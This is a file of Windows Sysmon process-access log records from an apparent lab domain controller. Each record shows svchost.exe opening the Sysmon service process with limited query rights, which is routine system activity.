{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1569,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1570,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.818\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.818","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
